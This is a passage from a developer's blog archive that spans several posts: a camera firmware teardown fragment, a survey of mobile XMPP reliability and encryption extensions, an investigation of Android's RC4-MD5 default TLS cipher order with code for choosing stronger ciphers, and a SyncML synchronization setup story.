from http://nx300:7679/livestream.avi
. However, a brief attempt to get
some video with wget or mplayer failed.
Firmware "Source Code"
The "source code" package provided on Samsung's OSS Release Center is 834 MBytes compressed and mainly contains three copies of the rootfs image (400-500MB each), and then some scripts. The actual build root is hidden under the second paper sheet link in the "Announcements" column.
Also, there are Obamapics in
TIZEN/project/NX300/image/rootdir/opt/sd0/DCIM/100PHOTO
.
The project is built on an ancient version of Tizen, on which I am no expert. Somebody else needs to take this stuff apart, make a proper build environment, or port OpenWRT to it.
Full series:
In a post from 2009 I described why XEP-0198: Stream Management is very important for mobile XMPP clients and which client and server applications support it. I have updated the post over the years with links to bug tracker issues and release notes to keep track of the (still rather sad) state of affairs. Short summary:
Servers supporting XEP-0198 with stream resumption: Prosody IM.
Clients supporting XEP-0198 with stream resumption: Gajim, yaxim.
Today, with the release of yaxim 0.8.7, the first mobile client actually supporting the specification is available! With yax.im there is also a public XMPP server (based on Prosody) specifically configured to easily integrate with yaxim.
Now is a good moment to recapitulate what we can get from this combination, and where the (mobile) XMPP community should be heading next.
So I have XEP-0198, am I good now?
Unfortunately, it is still not that easy. With XEP-0198, you can resume the previous session within some minutes after losing the TCP connection. While you are gone, the server will continue to display you as "online" to your contacts, because the session resumption is transparent to all parties.
However, if you have been gone for too long, it is better to inform your contacts about your absence by showing you as "offline". This is accomplished by destroying your session, making a later resumption impossible. It is a matter of server configuration how much time passes until that happens, and it is an important configuration trade-off. The longer you appear as "online" while actually being gone, the more frustration might accumulate in your buddy about your lack of reaction – on the other hand, if the session is terminated too early and your client reconnects right after that, all the state is gone!
Now what exactly happens to messages sent to you when the server destroys the session? In prosody, all messages pending since you disconnected are destroyed and error responses are sent back. This is perfectly legal as of XEP-0198, but a better solution would be to store them offline for later transmission.
However, offline storage is only useful if you are not connected with a different client at the same time. If you are, should the server redirect the messages to the other client? What if it already got them by means of carbon copies? How is your now-offline mobile client going to see that it missed something?
Even though XEP-0198 is a great step towards mobile messaging reliability, additional mechanisms need to be implemented to make XMPP really ready for mass-market usage (and users).
Entering Coverage Gaps
With XEP-0280: Message Carbons, all messages you send and receive on your desktop are automatically also copied to your mobile client, if it is online at that time. If you have a client like yaxim, that tries to stay online all the time and uses XEP-0198 to resume as fast as possible (on a typical 3G/WiFi change, this takes less than five seconds), you can have a completely synchronized message log on desktop and mobile.
However, if your smartphone is out of coverage for more than some minutes, the XEP-0198 session is destroyed, no message carbons are sent, and further messages are redirected to your desktop instead. When the mobile client finally reconnects, all it receives is suspicious silence.
XMPP was not designed for modern-day smartphone-based instant messaging. However, it is the best tool we have to counter the proprietary silo-based IM contenders like WhatsApp, Facebook Chat or Google Hangouts.
Therefore, we need to seek ways to provide the same (or a better) level of usability, without sacrificing the benefits of federation and open standards.
Message Synchronization
With XEP-0136: Message Archiving there is an arcane, properly over-engineered draft standard to allow a client to fetch collections of chat messages using a kind of version control system.
An easier, more modern approach is presented in
XEP-0313: Message Archive Management
(MAM). With MAM, it is much easier to synchronize the message log between a
client and a server, as the server extends all messages sent to the client
with an <archived>
tag and an ID. Later it is easily possible to obtain all
messages that arrived since then by issuing a query with the last known
archive ID.
Now it is up to the client implementors to add support for MAM! So far, it has been implemented in the web-based OTalk client, more are to come probably.
End-to-End Encryption
In the light of last year's revelations, it should be clear to everybody that end-to-end encryption is an essential part of any modern IM suite. Unfortunately, XMPP is not there yet. The XMPP Ubiquitous Encryption Manifesto is a step into the right direction, enforcing encryption of client-to-server connections as well as server-to-server connections. However, more needs to be done to protect against malicious server operators and sniffing of direct client-to-client transmissions.
There is Off-The Record Messaging (OTR), which provides strong encryption for chat conversations, and at the same time ensures (cryptographic) deniability. Unfortunately, cryptographic deniability provably does not save your ass. The only conclusion from that debacle can be: do not save any logs. This imposes a strong conflict of interest on Android, where the doctrine is: save everything to SQLite in case the OOM killer comes after you.
The other issue with OTR over XMPP (which some claim is solved in protocol version 3) is managing multiple (parallel) logins. OTR needs to keep the state of a conversation (encryption keys, initialization vectors and the like). If your chat buddy suddenly changes from a mobile device to the PC, the OTR state machine is confused, because that PC does not know the latest state. The result is, your conversation degrades into a bidirectional flood of "Can't decrypt this" error messages. This can be solved by storing the OTR state per resource (a resource is the unique identifier for each client you use with your account). This fix must be incorporated into all clients, and such things tend to take time. Ask me about adding OTR to yaxim next year.
Oh, by the way. OTR also does not mix well with archiving or carbons!
There is of course also PGP, which also provides end-to-end encryption, but requires you to store your key on a mobile device (or have a separate key for it). PGP can be combined with all kinds of archiving/copying mechanisms, and you could even store the encrypted messages on your device, requiring an unlock whenever you open the conversation. But PGP is rather heavy-weight, and there is no easy key exchange mechanism (OTR excels here with the Socialist Millionaire approach).
Encrypted Media
And then there are lolcats1. The Internet was made for them. But the XMPP community kind-of missed the trend. There is XEP-0096: File Transfer and XEP-0166: Jingle to negotiate a data transmission between two clients. Both protocols allow to negotiate in-band or proxy-based data transfers without encryption. "In-band" means that your multimedia file is split into handy chunks of at most 64 kilobytes each, base64-encoded, and sent via your server (and your buddy's server), causing some significant processing overhead and possibly triggering rate limiting on the server. However, if you trust your server administrator(s), this is the most secure way to transmit a file in a standards-compliant way.
You could use PGP to manually encrypt the file, send it using one of the mentioned mechanisms, and let your buddy manually decrypt the file. Besides the usability implications (nobody will use this!), it is a great and secure approach.
But usability is a killer, and so of course there are some proposals for encrypted end-to-end communication.
WebRTC
The browser developers did it right with WebRTC. You can have an end-to-end encrypted video conference between two friggin' browsers! This must have rang some bells, and JSON is cool, so there was a proposal to stack JSON ontop of XMPP for end-to-end encryption. Obviously because security is not complicated enough on its own.
XMPP Extensions Graveyard
Then there are ESessions, a deferred XEP from 2007, and Jingle-XTLS, which didn't even make it into an XEP, but looks promising otherwise. Maybe somebody should implement it, just to see if it works.
Custom Extensions
In the OTR specification v3, there is an additional mechanism to exchange a key for symmetric data encryption. This can be used to encrypt a file transmission or stream, in a non-standard way.
This is leveraged by CryptoCat, which is known for its security. CryptoCat is splitting the file into chunks of 64511 bytes (I am sure this is completely reasonable for an algorithm working on 16-byte blocks, so it needs to be applied 4031.9375 times), with the intention to fit them into 64KB transmission units for in-band transmission. AES256 is used in CTR mode and the transmissions are secured by HMAC-SHA512.
In ChatSecure, the OTR key exchange is leveraged even further, stacking HTTP on top of OTR on top of XMPP messages (on top of TLS on top of TCP). This might allow for fast results and a high degree of (library) code reuse, but it makes the protocol hard to understand, and in-the-wild debugging even harder.
A completely different path is taken by Jitsi, where Jingle VoIP sessions are protected using the Zimmerman RTP encryption scheme. Unfortunately, this mechanism does not transfer to file exchange.
And then iOS...
All the above only works on devices where you can keep a permanent connection to an XMPP server. Unfortunately, there is a huge walled garden full of devices that fail this simple task2. On Apple iOS, background connections are killed after a short time, the app developer is "encouraged" to use Apple's Push Service instead to notify the user of incoming chat messages.
This feature is so bizarre, you can not even count on the OS to launch your app if a "ping" message is received, you need to send all the content you want displayed in the user notification as part of the push payload. That means that as an iOS IM app author you have the choice between sacrificing privacy (clear-text chat messages sent to Apple's "cloud") or usability (display the user an opaque message in the kind of "Somebody sent you a message with some content, tap here to open the chat app to learn more").
And to add insult to injury, this mechanism is inherently incompatible with XMPP. If you write an XMPP client, your users should have the free choice of servers. However, as a client developer you need to centrally register your app and your own server(s) for Apple's push service to work.
Therefore, the iOS XMPP clients divide into two groups. In the first group there are apps that do not use Apple Push, that maintain your privacy but silently close the connection if the phone screen is turned off or another app is opened.
In the second group, there are apps that use their own custom proxy server, to which they forward your XMPP credentials (yes, your user name and password! They better have good privacy ToS). That proxy server then connects to your XMPP server and forwards all incoming and outgoing messages between your server and the app. If the app is killed by the OS, the proxy sends notifications via Apple Push, ensuring transparent functionality. Unfortunately, your privacy falls by the wayside, leaving a trail of data both with the proxy operators and Apple.
So currently, iOS users wishing for XMPP have the choice between broken security and broken usability – well done, Apple! Fortunately, there is light at the end of the tunnel. The oncoming train is an XEP proposal for Push Notifications (slides with explanation). It aims at separating the XMPP client, server, and push service tasks. The goal is to allow an XMPP client developer to provide their own push service, which the client app can register with any XMPP server. After the client app is killed, the XMPP server will inform the push service about a new message, which in turn informs Apple's (or any other OS vendor's) cloud, which in turn sends a push message to the device, which the user then can use to re-start the app.
This chain reaction is not perfect, and it does not solve the message-content privacy issue inherent to cloud notifications, but it would be a significant step forward. Let us hope it will be specified and implemented soon!
Summary
So we have solved connection stability (except on iOS). We know how to tackle synchronization of the message backlogs between mobile and desktop clients. Client connections are encrypted using TLS in almost all cases, server-to-server connections will follow soon (GMail, I am looking at you!).
End-to-end encryption of individual messages is well-handled by OTR, once all clients switch to storing the encryption state per resource. Group chats are out of luck currently.
The next big thing is to create an XMPP standard extension for end-to-end encryption of streaming data (files and real-time), to properly evaluate its security properties, and to implement it into one, two and all the other clients. Ideally, this should also cover group chats and group file sharing (e.g. on top of XEP-0214: File Repository and Sharing plus XEP-0329: File Information Sharing).
If we can manage that, we can also convince all the users of WhatsApp, Facebook and Google Hangouts to switch to an open protocol that is ready for the challenges of 2014.
transmitted from one place to another. For the sake of this discussion, streaming content is considered as "multimedia" as much as the transmission of image, video or other files.
because it prevents evil apps from eating the device battery in the background. I am sure it is a feature indeed – one intended to route all your IM traffic through an infinite loop).
tl;dr
Android is using the combination of horribly broken RC4 and MD5 as the first default cipher on all SSL connections. This impacts all apps that did not care enough to change the list of enabled ciphers (i.e. almost all existing apps). This post investigates why RC4-MD5 is the default cipher, and why it replaced better ciphers which were in use prior to the Android 2.3 release in December 2010.
Preface
Some time ago, I was adding secure authentication to my APRSdroid app for Amateur Radio geolocation. While debugging its TLS handshake, I noticed that RC4-MD5 is leading the client's list of supported ciphers and thus wins the negotiation. As the task at hand was about authentication, not about secrecy, I did not care.
However, following speculations about what the NSA can decrypt, xnyhps' excellent post about XMPP clients (make sure to read the whole series) brought it into my focus again and I seriously asked myself what reasons led to it.
Status Quo Analysis
First, I fired up Wireshark, started yaxim on my Android 4.2.2 phone (CyanogenMod 10.1.3 on a Galaxy Nexus) and checked the Client Hello packet sent. Indeed, RC4-MD5 was first, followed by RC4-SHA1:
To quote from RFC 2246: "The CipherSuite list, passed from the client to the server in the client hello message, contains the combinations of cryptographic algorithms supported by the client in order of the client's preference (favorite choice first)." Thus, the server is encouraged to actually use RC4-MD5 if it is not explicitly forbidden by its configuration.
I crammed out my legacy devices and cross-checked Android 2.2.1 (CyanogenMod 6.1.0 on HTC Dream), 2.3.4 (Samsung original ROM on Galaxy SII) and 2.3.7 (CyanogenMod 7 on a Galaxy 5):
Android 2.2.1 | Android 2.3.4, 2.3.7 | Android 4.2.2, 4.3 |
---|---|---|
DHE-RSA-AES256-SHA | RC4-MD5 | RC4-MD5 |
DHE-DSS-AES256-SHA | RC4-SHA | RC4-SHA |
AES256-SHA | AES128-SHA | AES128-SHA |
EDH-RSA-DES-CBC3-SHA | DHE-RSA-AES128-SHA | AES256-SHA |
EDH-DSS-DES-CBC3-SHA | DHE-DSS-AES128-SHA | ECDH-ECDSA-RC4-SHA |
DES-CBC3-SHA | DES-CBC3-SHA | ECDH-ECDSA-AES128-SHA |
DES-CBC3-MD5 | EDH-RSA-DES-CBC3-SHA | ECDH-ECDSA-AES256-SHA |
DHE-RSA-AES128-SHA | EDH-DSS-DES-CBC3-SHA | ECDH-RSA-RC4-SHA |
DHE-DSS-AES128-SHA | DES-CBC-SHA | ECDH-RSA-AES128-SHA |
AES128-SHA | EDH-RSA-DES-CBC-SHA | ECDH-RSA-AES256-SHA |
RC2-CBC-MD5 | EDH-DSS-DES-CBC-SHA | ECDHE-ECDSA-RC4-SHA |
RC4-SHA | EXP-RC4-MD5 | ECDHE-ECDSA-AES128-SHA |
RC4-MD5 | EXP-DES-CBC-SHA | ECDHE-ECDSA-AES256-SHA |
RC4-MD5 | EXP-EDH-RSA-DES-CBC-SHA | ECDHE-RSA-RC4-SHA |
EDH-RSA-DES-CBC-SHA | EXP-EDH-DSS-DES-CBC-SHA | ECDHE-RSA-AES128-SHA |
EDH-DSS-DES-CBC-SHA | ECDHE-RSA-AES256-SHA | |
DES-CBC-SHA | DHE-RSA-AES128-SHA | |
DES-CBC-MD5 | DHE-RSA-AES256-SHA | |
EXP-EDH-RSA-DES-CBC-SHA | DHE-DSS-AES128-SHA | |
EXP-EDH-DSS-DES-CBC-SHA | DHE-DSS-AES256-SHA | |
EXP-DES-CBC-SHA | DES-CBC3-SHA | |
EXP-RC2-CBC-MD5 | ECDH-ECDSA-DES-CBC3-SHA | |
EXP-RC2-CBC-MD5 | ECDH-RSA-DES-CBC3-SHA | |
EXP-RC4-MD5 | ECDHE-ECDSA-DES-CBC3-SHA | |
EXP-RC4-MD5 | ECDHE-RSA-DES-CBC3-SHA | |
EDH-RSA-DES-CBC3-SHA | ||
EDH-DSS-DES-CBC3-SHA | ||
DES-CBC-SHA | ||
EDH-RSA-DES-CBC-SHA | ||
EDH-DSS-DES-CBC-SHA | ||
EXP-RC4-MD5 | ||
EXP-DES-CBC-SHA | ||
EXP-EDH-RSA-DES-CBC-SHA | ||
EXP-EDH-DSS-DES-CBC-SHA |
As can be seen, Android 2.2.1 came with a set of AES256-SHA1 ciphers first, followed by 3DES and AES128. Android 2.3 significantly reduced the security by removing AES256 and putting the broken RC4-MD5 on the prominent first place, followed by the not-so-much-better RC4-SHA1.
Wait... What?
Yes, Android versions before 2.3 were using AES256 > 3DES > AES128 > RC4, and starting with 2.3 it was now: RC4 > AES128 > 3DES. Also, the recently broken MD5 suddenly became the favorite MAC (Update: MD5 in TLS is OK, as it is combining two different variants).
As Android 2.3 was released in late 2010, speculations about the NSA pouring money on Android developers to sabotage all of us poor users arose immediately. I needed to do something, so I wrote a minimal test program (APK, source) and single-stepped it to find the origin of the default cipher list.
It turned out to be in Android's libcore package, NativeCrypto.getDefaultCipherSuites() which returns a hardcoded String array starting with "SSL_RSA_WITH_RC4_128_MD5".
Diving Into the Android Source
Going back on that file's change history revealed interesting things, like the addition of TLS v1.1 and v1.2 and its almost immediate removal with a suspicious commit message (taking place between Android 4.0 and 4.1, possible reasoning), added support for Elliptic Curves and AES256 in Android 3.x, and finally the addition of our hardcoded string list sometime before Android 2.3:
public static String[] getDefaultCipherSuites() {
- int ssl_ctx = SSL_CTX_new();
- String[] supportedCiphers = SSL_CTX_get_ciphers(ssl_ctx);
- SSL_CTX_free(ssl_ctx);
- return supportedCiphers;
+ return new String[] {
+ "SSL_RSA_WITH_RC4_128_MD5",
+ "SSL_RSA_WITH_RC4_128_SHA",
+ "TLS_RSA_WITH_AES_128_CBC_SHA",
...
+ "SSL_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA",
+ "SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA"
+ };
}
The commit message tells us: We now have a default cipher suite list that is
chose to match RI behavior and priority, not based on OpenSSLs default and
priorities.
Translated into English: before, we just used the list from OpenSSL (which was
really good), now we make our own list... with blackjack! ...and
hookers! with RC4! ...and MD5!
The test suite comes with another hint:
// Note these are added in priority order as defined by RI 6 documentation.
That RI 6 for sure has nothing to do with MI 6, but stands for Reference Implementation, the Sun (now Oracle) Java SDK version 6.
So what the fine Google engineers did to reduce our security was merely to copy what was there, defined by the inventors of Java!
Cipher Order in the Java Runtime
In the Java reference implementation, the code responsible for creating the cipher list is split into two files. First, a priority-ordered set of ciphers is constructed in the CipherSuite class:
// Definition of the CipherSuites that are enabled by default.
// They are listed in preference order, most preferred first.
int p = DEFAULT_SUITES_PRIORITY * 2;
add("SSL_RSA_WITH_RC4_128_MD5", 0x0004, --p, K_RSA, B_RC4_128, N);
add("SSL_RSA_WITH_RC4_128_SHA", 0x0005, --p, K_RSA, B_RC4_128, N);
...
Then, all enabled ciphers with sufficient priority are added to the list for CipherSuiteList.getDefault(). The cipher list has not experienced relevant changes since the initial import of Java 6 into Hg, when the OpenJDK was brought to life.
Going back in time reveals that even in the 1.4.0 JDK, the first one incorporating the JSEE extension for SSL/TLS, the list was more or less the same:
Java 1.4.0 (2002) | Java 1.4.2_19, 1.5.0 (2004) | Java 1.6 (2006) |
---|---|---|
SSL_RSA_WITH_RC4_128_SHA | SSL_RSA_WITH_RC4_128_MD5 | SSL_RSA_WITH_RC4_128_MD5 |
SSL_RSA_WITH_RC4_128_MD5 | SSL_RSA_WITH_RC4_128_SHA | SSL_RSA_WITH_RC4_128_SHA |
SSL_RSA_WITH_DES_CBC_SHA | TLS_RSA_WITH_AES_128_CBC_SHA | TLS_RSA_WITH_AES_128_CBC_SHA |
SSL_RSA_WITH_3DES_EDE_CBC_SHA | TLS_DHE_RSA_WITH_AES_128_CBC_SHA | TLS_DHE_RSA_WITH_AES_128_CBC_SHA |
SSL_DHE_DSS_WITH_DES_CBC_SHA | TLS_DHE_DSS_WITH_AES_128_CBC_SHA | TLS_DHE_DSS_WITH_AES_128_CBC_SHA |
SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA | SSL_RSA_WITH_3DES_EDE_CBC_SHA | SSL_RSA_WITH_3DES_EDE_CBC_SHA |
SSL_RSA_EXPORT_WITH_RC4_40_MD5 | SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA | SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA |
SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA | SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA | SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA |
SSL_RSA_WITH_NULL_MD5 | SSL_RSA_WITH_DES_CBC_SHA | SSL_RSA_WITH_DES_CBC_SHA |
SSL_RSA_WITH_NULL_SHA | SSL_DHE_RSA_WITH_DES_CBC_SHA | SSL_DHE_RSA_WITH_DES_CBC_SHA |
SSL_DH_anon_WITH_RC4_128_MD5 | SSL_DHE_DSS_WITH_DES_CBC_SHA | SSL_DHE_DSS_WITH_DES_CBC_SHA |
SSL_DH_anon_WITH_DES_CBC_SHA | SSL_RSA_EXPORT_WITH_RC4_40_MD5 | SSL_RSA_EXPORT_WITH_RC4_40_MD5 |
SSL_DH_anon_WITH_3DES_EDE_CBC_SHA | SSL_RSA_EXPORT_WITH_DES40_CBC_SHA | SSL_RSA_EXPORT_WITH_DES40_CBC_SHA |
SSL_DH_anon_EXPORT_WITH_RC4_40_MD5 | SSL_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA | SSL_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA |
SSL_DH_anon_EXPORT_WITH_DES40_CBC_SHA | SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA | SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA |
TLS_EMPTY_RENEGOTIATION_INFO_SCSV |
The original list resembles the CipherSpec definition in RFC 2246 from 1999, sorted numerically with the NULL and 40-bit ciphers moved down. Somewhere between the first release and 1.4.2, DES was deprecated, TLS was added to the mix (bringing in AES) and MD5 was pushed in front of SHA1 (which makes one wonder why). After that, the only chage was the addition of TLS_EMPTY_RENEGOTIATION_INFO_SCSV, which is not a cipher but just an information token for the server.
Java 7 added Elliptic Curves and significantly improved the cipher list in 2011, but Android is based on JDK 6, making the effective default cipher list over 10 years old now.
Conclusion
The cipher order on the vast majority of Android devices was defined by Sun in 2002 and taken over into the Android project in 2010 as an attempt to improve compatibility. RC4 is considered problematic since 2001 (remember WEP?), MD5 was broken in 2009.
The change from the strong OpenSSL cipher list to a hardcoded one starting with weak ciphers is either a sign of horrible ignorance, security incompetence or a clever disguise for an NSA-influenced manipulation - you decide! (This was before BEAST made the other ciphers in TLS less secure in 2011 and RC4 gained momentum again)
All that notwithstanding, now is the time to get rid of RC4-MD5, in your applications as well as in the Android core! Call your representative on the Google board and let them know!
Appendix A: Making your app more secure
If your app is only ever making contact to your own server, feel free to choose the best cipher that fits into your CPU budget! Otherwise, it is hard to give generic advice for an app to support a wide variety of different servers without producing obscure connection errors.
Update: Server-Side Changes
The cipher priority order is defined by the client, but the server has the option to override it with its own. Server operators should read the excellent best practices document by SSLLabs.
Further resources for server admins:
Changing the client cipher list
For client developers, I am recycling the well-motivated browser cipher suite proposal written by Brian Smith at Mozilla, even though I share Bruce Schneier's scepticism on EC cryptography. The following is a subset of Brian's ciphers which are supported on Android 4.2.2, and the last three ciphers are named SSL_ instead of TLS_ (Warning: BEAST ahead!).
// put this in a place where it can be reused
static final String ENABLED_CIPHERS[] = {
"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",
"TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",
"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",
"TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA",
"TLS_DHE_RSA_WITH_AES_128_CBC_SHA",
"TLS_DHE_RSA_WITH_AES_256_CBC_SHA",
"TLS_DHE_DSS_WITH_AES_128_CBC_SHA",
"TLS_ECDHE_RSA_WITH_RC4_128_SHA",
"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA",
"TLS_RSA_WITH_AES_128_CBC_SHA",
"TLS_RSA_WITH_AES_256_CBC_SHA",
"SSL_RSA_WITH_3DES_EDE_CBC_SHA",
"SSL_RSA_WITH_RC4_128_SHA",
"SSL_RSA_WITH_RC4_128_MD5",
};
// get a new socket from the factory
SSLSocket s = (SSLSocket)sslcontext.getSocketFactory().createSocket(host, port);
// IMPORTANT: set the cipher list before calling getSession(),
// startHandshake() or reading/writing on the socket!
s.setEnabledCipherSuites(ENABLED_CIPHERS);
...
Use TLS v1.2!
By default, TLS version 1.0 is used, and the more recent protocol versions are disabled. Some servers used to be broken when contacted using v1.2, so this approach seemed a good conservative choice over a year ago.
At least for XMPP, an attempt to enforce TLS v1.2 is being made. You can follow with your own app easily:
// put this in a place where it can be reused
static final String ENABLED_PROTOCOLS[] = {
"TLSv1.2", "TLSv1.1", "TLSv1"
};
// put this right before setEnabledCipherSuites()!
s.setEnabledProtocols(ENABLED_PROTOCOLS);
Use NetCipher!
NetCipher is an Android library made by the Guardian Project to improve network security for mobile apps. It comes with a StrongTrustManager to do more thorough certificate checks, an independent Root CA store, and code to easily route your traffic through the Tor network using Orbot.
Use AndroidPinning!
AndroidPinning is another Android library, written by Moxie Marlinspike to allow pinning of server certificates, improving security against government-scale MitM attacks. Use this if your app is made to communicate with a specific server!
Use MemorizingTrustManager!
MemorizingTrustManager by yours truly is yet another Android library. It allows your app to ask the user if they want to trust a given self-signed/untrusted certificate, improving support for regular connections to private services. If you are writing an XMPP client or a private cloud sync app, use this!
Appendix B: Apps that do care
Android Browser
Checks of the default Android Browser revealed that at least until Android 2.3.7 the Browser was using the default cipher list of the OS, participating in the RC4 regression.
As of 4.2.2, the Browser comes with a longer, better, stronger cipher list:
ECDHE-RSA-AES256-SHA ECDHE-ECDSA-AES256-SHA SRP-DSS-AES-256-CBC-SHA SRP-RSA-AES-256-CBC-SHA DHE-RSA-AES256-SHA DHE-DSS-AES256-SHA ECDH-RSA-AES256-SHA ECDH-ECDSA-AES256-SHA AES256-SHA ECDHE-RSA-DES-CBC3-SHA ECDHE-ECDSA-DES-CBC3-SHA SRP-DSS-3DES-EDE-CBC-SHA SRP-RSA-3DES-EDE-CBC-SHA EDH-RSA-DES-CBC3-SHA EDH-DSS-DES-CBC3-SHA ECDH-RSA-DES-CBC3-SHA ECDH-ECDSA-DES-CBC3-SHA DES-CBC3-SHA ECDHE-RSA-AES128-SHA ECDHE-ECDSA-AES128-SHA SRP-DSS-AES-128-CBC-SHA SRP-RSA-AES-128-CBC-SHA DHE-RSA-AES128-SHA DHE-DSS-AES128-SHA ECDH-RSA-AES128-SHA ECDH-ECDSA-AES128-SHA AES128-SHA ECDHE-RSA-RC4-SHA ECDHE-ECDSA-RC4-SHA ECDH-RSA-RC4-SHA ECDH-ECDSA-RC4-SHA RC4-SHA RC4-MD5
Update: Surprisingly, the Android WebView class (tested on Android 4.0.4) is also using the better ciphers.
Update: Google Chrome
The Google Chrome browser (version 30.0.1599.82, 2013-10-11) serves the following list:
ECDHE-RSA-AES256-GCM-SHA384 ECDHE-ECDSA-AES256-GCM-SHA384 ECDHE-RSA-AES256-SHA ECDHE-ECDSA-AES256-SHA DHE-DSS-AES256-GCM-SHA384 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256 DHE-DSS-AES256-SHA256 DHE-RSA-AES256-SHA DHE-DSS-AES256-SHA AES256-GCM-SHA384 AES256-SHA256 AES256-SHA ECDHE-RSA-DES-CBC3-SHA ECDHE-ECDSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA EDH-DSS-DES-CBC3-SHA DES-CBC3-SHA ECDHE-RSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-RSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA256 ECDHE-RSA-AES128-SHA ECDHE-ECDSA-AES128-SHA DHE-DSS-AES128-GCM-SHA256 DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES128-SHA256 DHE-DSS-AES128-SHA256 DHE-RSA-AES128-SHA DHE-DSS-AES128-SHA AES128-GCM-SHA256 AES128-SHA256 AES128-SHA ECDHE-RSA-RC4-SHA ECDHE-ECDSA-RC4-SHA RC4-SHA RC4-MD5
This one comes with AES256-GCM and SHA384! Good work, Google! Now please go and make these the default for the Android runtime!
Update: Firefox
Firefox Browser for Android (version 24.0 from F-Droid) comes with its own cipher suite as well. However, contrary to Chrome, it is missing the GCM ciphers to mitigate the BEAST attack.
ECDHE-ECDSA-AES256-SHA ECDHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA DHE-DSS-CAMELLIA256-SHA DHE-RSA-AES256-SHA DHE-DSS-AES256-SHA ECDH-RSA-AES256-SHA ECDH-ECDSA-AES256-SHA CAMELLIA256-SHA AES256-SHA ECDHE-ECDSA-RC4-SHA ECDHE-ECDSA-AES128-SHA ECDHE-RSA-RC4-SHA ECDHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA DHE-DSS-CAMELLIA128-SHA DHE-RSA-AES128-SHA DHE-DSS-AES128-SHA ECDH-RSA-RC4-SHA ECDH-RSA-AES128-SHA ECDH-ECDSA-RC4-SHA ECDH-ECDSA-AES128-SHA SEED-SHA CAMELLIA128-SHA RC4-SHA RC4-MD5 AES128-SHA ECDHE-ECDSA-DES-CBC3-SHA ECDHE-RSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA EDH-DSS-DES-CBC3-SHA ECDH-RSA-DES-CBC3-SHA ECDH-ECDSA-DES-CBC3-SHA FIPS-3DES-EDE-CBC-SHA DES-CBC3-SHA
My favorite pick from that list: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA.
Enabling TLSv1.2 does not change the cipher list. BEAST is mitigated in TLSv1.2, but the Lucky13 attack might still bite you.
Send In Your App!
If you have an Android app with a significant user base that has a better cipher list, let me know and I will add it to the list.
Further Reading
- Real World Crypto 2013 by Adam Langley from Google
- Why does the web still run on RC4? by Luke Mather
- SSL/TLS in a Post-PRISM Era
- CyanogenMod issue
- Android issue #61085
- Test your browser
- A revised version of this article appeared in the Magdeburger Journal zur Sicherheitsforschung (PDF).
- Comments: HN, Slashdot, Reddit
My love hate aversion to SyncML
Some years ago, I accidentally managed to synchronize my Nokia E65 phone to Evolution using Bluetooth, OpenSync packages from a custom repository, a huge amount of patience and a blood sacrifice to the gods of bloated binary XML protocols.
Unfortunately, soon after that my file system crashed, I reinstalled Debian and the magic setup was forever gone. Whatever I tried, all I got were opaque error messages. After many months of moot efforts, I finally gave up the transfer of events onto my phone and of phone numbers onto my PC. Sigh.
It was only last autumn that I dared challenging my luck again. After setting up a new colo box (it is serving this blog article right now) and having upgraded my Android toy-phone to an Android 2.x firmware, it was time to get my data from the good old Nokia phone to the Android device. Somehow.
The Quest of SyncML, part 1: eGroupWare
I began my quest by simply installing the current version of eGroupWare from the Debian Backports repository. Unfortunately, this version (1.6.002) is flawed with regard to SyncML. It worked partially with my cell phone, and failed miserably with Evolution.
After several days of fruitless efforts, I found a
set of SyncML patches for eGroupWare written by Jörg Lehrke,
which are already integrated into 1.6.003. Fortunately, eGroupWare.org is
offering Debian 5.0 packages as well. I just added the following line to my
/etc/apt/sources.list
and installed the new version:
deb http://download.opensuse.org/repositories/server:/eGroupWare/Debian_5.0/ ./
Do not forget to import the repository key as well:
wget -O - http://download.opensuse.org/repositories/server:/eGroupWare/Debian_5.0/Release.key | apt-key add -
With the shiny new eGroupWare, I only needed to wipe my previous
synchronization efforts and to enable the SyncML application for the Default
user group. Et voila, I could access my new RPC server at https://<servername>/egroupware/rpc.php
Part 2: Evolution
This step does work more or less properly, an official HOWTO is available. The only thing I have not automated yet is the fact of synchronization. It still requires manually running
syncevolution <servername>
Update, 2011-05-15: If you are running debian, do not use it's default packages. After my last dist-upgrade (sid), syncevolution thought it was a good idea to parse its plaintext config files, generate an XML-based config and throw it up on me due to strange parser errors.
Uninstalling syncevolution*
and using the syncevolution-evolution
package from
deb http://downloads.syncevolution.org/apt unstable main
solved my troubles however.
Part 3: Nokia E65
Fortunately, Nokia already includes a SyncML client with their smartphones. It is almost trivial to set up following the official howto. However, with eGroupWare 1.6.003, I could set the SyncML version to 1.2 to obtain the full contacts information.
Fortunately, it was also very easy to add the CAcert root certificate to the Nokia device, allowing end-to-end encryption of my sensitive personal data.
Part 4: Android
Now, the real fun began. Android comes preinstalled with a well-working synchronization service which is pushing all your data to Google servers. Not that I would mind Google having the data, I just wanted to be able to snapshot my contacts and calendar whenever I need to.
There are as well clients for other synchronization protocols. ActiveSync is supported out-of-the-box (and there is the GPL'ed Z-Push ActiveSync server); Funambol and Synthesis implement SyncML on Android.
Because I already had SyncML running and Funambol is Open-Source and looked generally promising, I started my work with it. However, the Android client is "optimized" for interacting with the Funambol server (read: it interoperates with other implementations only by chance).
